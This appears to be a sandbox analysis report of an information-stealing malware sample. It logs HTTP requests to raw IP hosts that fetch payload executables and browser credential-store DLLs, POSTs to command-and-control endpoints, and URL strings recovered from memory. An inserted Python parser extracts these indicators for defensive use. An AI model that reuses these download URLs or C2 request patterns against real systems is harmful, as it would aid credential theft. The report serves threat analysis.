Source: global traffic HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 561Host: 62.133.61.172
Source: unknown TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.9
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.178
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0050B480 InternetReadFile,InternetCloseHandle, 2_2_0050B480
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66d70775c548d_v.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66d7077a2064d_l.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66d7077a2064d_l.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: api64.ipify.org
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: 240902180529931.tyr.zont16.com
Source: global traffic DNS traffic detected: DNS query: file-link-iota.vercel.app
Source: global traffic DNS traffic detected: DNS query: youtransfer.net
Source: global traffic DNS traffic detected: DNS query: iplogger.org
Source: global traffic DNS traffic detected: DNS query: traineiwnqo.shop
Source: global traffic DNS traffic detected: DNS query: locatedblsoqp.shop
Source: global traffic DNS traffic detected: DNS query: stamppreewntnq.shop
Source: global traffic DNS traffic detected: DNS query: condedqpwqm.shop
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stamppreewntnq.shop
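Added example (not part of this report or the sandbox vendor's tooling): a small parser for the observation lines above that recovers method, host and path from the run-together request headers, collects DNS names, flags any host that served the browser-credential-store DLL set (the NSS libraries freebl3/mozglue/nss3/softokn3 plus sqlite3, which this sample's second host renames to sql.dll), and cleans the URL strings that appear later in the report under "String found in binary or memory" by matching them against the URLs actually requested on the wire. The sample lines are copied from the entries above; the DLL set, the threshold of three DLLs, and the fallback cut at the first .exe/.dll/.php are my assumptions.

```python
import re
from collections import defaultdict

# Constructed sample: observation lines copied from this report. Text extraction ran the
# HTTP headers together ("HTTP/1.1User-Agent:", "...104Cache-Control:"), so the parser
# has to find header boundaries by header name rather than by line break.
SAMPLE_LINES = [
    "Source: global traffic HTTP traffic detected: GET /yuop/66d72df86b9f3_crypted.exe#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache",
    "Source: global traffic HTTP traffic detected: GET /prog/66d70775c548d_v.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache",
    "Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache",
    "Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache",
    "Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache",
    "Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache",
    "Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache",
    "Source: global traffic HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache",
    "Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache",
    "Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache",
    "Source: global traffic DNS traffic detected: DNS query: stamppreewntnq.shop",
    "Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stamppreewntnq.shop",
]

REQ_RE = re.compile(r"HTTP traffic detected: (GET|POST) (\S+) HTTP/1\.[01]")
# The Host value ends where the next run-together header name (or the line) begins.
HOST_RE = re.compile(r"Host: ([A-Za-z0-9.\-:]+?)(?=Cache-Control|Connection|Content-|User-Agent|$)")
DNS_RE = re.compile(r"DNS query: (\S+)$")

# Assumed DLL set: what a stealer pulls to read Firefox (NSS) and Chromium (sqlite)
# credential stores. sql.dll is this sample's renamed sqlite3.dll on 147.45.68.138.
CRED_DLLS = {"sqlite3.dll", "sql.dll", "freebl3.dll", "mozglue.dll", "nss3.dll", "softokn3.dll"}


def parse_observations(lines):
    """Return (requests, dns): requests is a list of (method, host, path), dns a set of names."""
    requests, dns = [], set()
    for line in lines:
        m, h = REQ_RE.search(line), HOST_RE.search(line)
        if m and h:
            requests.append((m.group(1), h.group(1), m.group(2)))
            continue
        d = DNS_RE.search(line)
        if d:
            dns.add(d.group(1))
    return requests, dns


def credential_dll_hosts(requests, threshold=3):
    """Hosts from which at least `threshold` distinct credential-store DLLs were fetched."""
    seen = defaultdict(set)
    for method, host, path in requests:
        name = path.rsplit("/", 1)[-1].lower()
        if method == "GET" and name in CRED_DLLS:
            seen[host].add(name)
    return {h: sorted(n) for h, n in seen.items() if len(n) >= threshold}


def known_urls(requests):
    """Full URLs exactly as requested on the wire (fragment tags such as #1 are kept,
    because this downloader sends them and they distinguish payload jobs)."""
    return {f"http://{host}{path}" for method, host, path in requests if method == "GET"}


def canonical_url(raw, known):
    """Clean a URL recovered from process memory using the captured requests as ground truth.
    Memory strings carry trailing junk ("...Front.exe1aH", "...#spaceC:"); the longest
    captured URL that prefixes the string is the real indicator. Without a match, cut at
    the first .exe/.dll/.php and drop any fragment; this is conservative and may under-cut."""
    hits = [u for u in known if raw.startswith(u)]
    if hits:
        return max(hits, key=len)
    m = re.match(r"(https?://[^\s#]+?\.(?:exe|dll|php))", raw)
    return m.group(1) if m else raw.split("#", 1)[0]


if __name__ == "__main__":
    reqs, names = parse_observations(SAMPLE_LINES)
    print("hosts serving credential DLLs:", credential_dll_hosts(reqs))
    print("dns:", sorted(names))
    for s in ("http://147.45.44.104/yuop/66d72df86b9f3_crypted.exe#1yHc",
              "http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe1aH"):
        print(s, "->", canonical_url(s, known_urls(reqs)))
```

The wire capture is the authority here: the same path appears in memory with a fragment tag (66d70775c548d_v.exe#space) but was requested without one, so prefix matching keeps the form that actually crossed the network and the fallback only applies to URLs the sandbox never saw requested.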
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2388267970.0000000001344000.00000008.00000001.01000000.00000012.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2664396294.000000000134D000.00000008.00000001.01000000.00000012.sdmp String found in binary or memory: http://.css
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2388267970.0000000001344000.00000008.00000001.01000000.00000012.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2664396294.000000000134D000.00000008.00000001.01000000.00000012.sdmp String found in binary or memory: http://.jpg
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/lopsa/66d753b13350c_cry.exe#kiscrypto
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/lopsa/66d753b13350c_cry.exe#kiscrypto.
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe1
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe1.
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe1aH
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe1n
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe5-i
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exeC:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exeCZ96nQr
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exeiH
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d707730e9bf_s.exe#space
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d707730e9bf_s.exe#spaceC:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d707730e9bf_s.exe#spaceW-
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d707730e9bf_s.exe#spacecryptol
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d707730e9bf_s.exe#spacers
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d707730e9bf_s.exe#spacexin)HS
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DCE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d70775c548d_v.exe#space
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d70775c548d_v.exe#spaceC:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d70775c548d_v.exe#spaceE-
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d70775c548d_v.exe#spacell
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exe
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exeC:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exee
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exee.
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exeeYH
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exely.
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exemN-
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exeo.
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exe
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exeC:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exeK
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exeQH
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exea-
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exeeO
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exev
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d58b1858bcb_crypted.exe#xin
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d58b1858bcb_crypted.exe#xinC:
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d58b1858bcb_crypted.exe#xinJs
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d58b1858bcb_crypted.exe#xinto
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upus
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upus0DVJtBG
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upus;
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusB9b
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusC:
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusce
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusm
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusmt
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d60cd3ce002_SeparatelyDied.exe#sun
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d60cd3ce002_SeparatelyDied.exe#sun2658-3693405117-2476756634-1003
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d60cd3ce002_SeparatelyDied.exe#sun3
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d60cd3ce002_SeparatelyDied.exe#sun3tn?
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d60cd3ce002_SeparatelyDied.exe#sun?
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d60cd3ce002_SeparatelyDied.exe#sunC:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d72df86b9f3_crypted.exe#1
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d72df86b9f3_crypted.exe#1C:
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d72df86b9f3_crypted.exe#1Zs
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d72df86b9f3_crypted.exe#1yHc
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d72df86b9f3_crypted.exe#1yy3GtoRvFKon$
Source: DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:80
Source: DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:80hellohttps://t.me/edm0di11iMozilla/5.0
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.216.17.178/edge/msconfig32.exe#pend
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.216.17.178/edge/msconfig32.exe#pendC:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.216.17.178/edge/msconfig32.exe#pendXOp
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.109/bobr
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.109/bobr1
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.109/bobrC:
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.109/bobrJ
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.109/bobrb
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/6
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp, kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014E8000.00000004.00000020.00020000.00000000.sdmp, kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php/
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php2
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpF
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpZ
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpb
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpt
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DDB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://240902180529931.tyr.zont16.com/
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://240902180529931.tyr.zont16.com/f/fikbam0902931.exe
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://240902180529931.tyr.zont16.com/f/fikbam0902931.exeC:
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://240902180529931.tyr.zont16.com/f/fikbam0902931.exeDpP
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D4F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.9/nokia/lamp.exe
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.9/nokia/lamp.exeC:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.9/nokia/lamp.exeyE
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.9/nokia/lamp.exeyJ
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.133.61.172/
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.133.61.172/7O
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.133.61.172/api/crazyfish.php
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.133.61.172/api/twofish.php
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.133.61.172/api/twofish.php(
